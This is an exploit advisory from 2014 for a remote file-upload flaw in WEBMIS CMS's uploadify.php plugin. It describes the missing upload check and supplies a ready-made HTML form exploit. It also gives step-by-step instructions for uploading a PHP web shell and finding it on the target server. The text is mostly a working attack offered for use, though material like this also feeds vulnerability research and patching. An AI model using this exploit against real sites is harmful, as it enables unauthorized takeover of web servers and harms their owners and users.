##################################################################################################
#Exploit Title : WEBMIS CMS Shell Upload vulnerability
#Author        : Jagriti Sahu
#Vendor        : http://www.ksphp.com
#Download Link : https://github.com/ksphp/webmis
#version affected : all
#Date          : 14/07/2014
#Discovered at : IndiShell Lab
#Love to       : Surbhi, Mradula and Harry
##################################################################################################

////////////////////////
/// Overview:
////////////////////////


WEBMIS is the underlying PHP development system, multi-user, 
development of CI model MVC multiple access scheme based on, can add 
background management menu, the integration of Jquery, TinyMCE editor 
plugin, concise, beautiful bomb box effect!
This CMS is affected from remote file upload vulnerability and attacker 
can upload php shell to website easily

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to webmis/plugin/uploadify/uploadify.php file in 
which there is no check during file upload
attacker need to forward file upload request to this file with PHP 
shell and file upload path


///////////////////////
///  exploit code  ////
///////////////////////
<form 
action="http://localhost/webmis_installation/plugin/uploadify/uploadify.php" 
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type=text name="path" value="/webmis_installation/plugin/">
<input type=text name="someKey" value="someValue"]>
<input type="submit" name="submit" value="Submit">
</form>


save this code on you machine as exploit.html
open exploit.html into webbrowser, brows your php shell and click 
submit button

shell will be uploaded in uploads directory
http://localhost/webmis_installation/plugin/shell.php